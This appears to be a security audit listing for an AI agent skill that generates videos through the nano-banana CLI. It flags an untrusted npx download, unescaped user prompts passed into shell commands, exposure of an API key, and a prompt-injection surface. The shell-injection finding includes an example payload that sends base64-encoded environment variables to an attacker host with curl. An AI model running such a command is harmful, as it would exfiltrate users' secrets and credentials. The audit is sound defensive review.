The Agent Skills Directory

[EXTERNAL_DOWNLOADS] (HIGH): The skill requires the installation of a CLI tool via npx @the-focus-ai/nano-banana.
Evidence: The organization @the-focus-ai is not a trusted source. Using npx to download and execute code from an unknown third-party repository poses a significant risk of remote code execution (RCE) if the package is malicious or its account is compromised.
[COMMAND_EXECUTION] (HIGH): The skill takes natural language input from the user and interpolates it directly into shell commands.
Evidence: The command nano-banana --video "<prompt>" executes user-provided strings. An attacker could use shell metacharacters (e.g., "; curl http://attacker.com/$(env | base64) #") to bypass the intended command and execute arbitrary code on the system.
[CREDENTIALS_UNSAFE] (MEDIUM): The skill instructs the user to store a sensitive GEMINI_API_KEY in environment variables or a .env file.
Evidence: While necessary for functionality, the instruction for the agent to manage or interact with a environment containing these credentials increases the risk of exposure, especially when combined with the untrusted CLI tool mentioned above.
[INDIRECT PROMPT INJECTION] (HIGH): Vulnerability surface identified where untrusted user content is processed by a high-privilege tool.
Ingestion points: User prompt input for video generation.
Boundary markers: None (direct interpolation into shell strings).
Capability inventory: Shell command execution via nano-banana CLI.
Sanitization: No evidence of shell escaping or prompt validation before execution.

Nano Banana Video Generation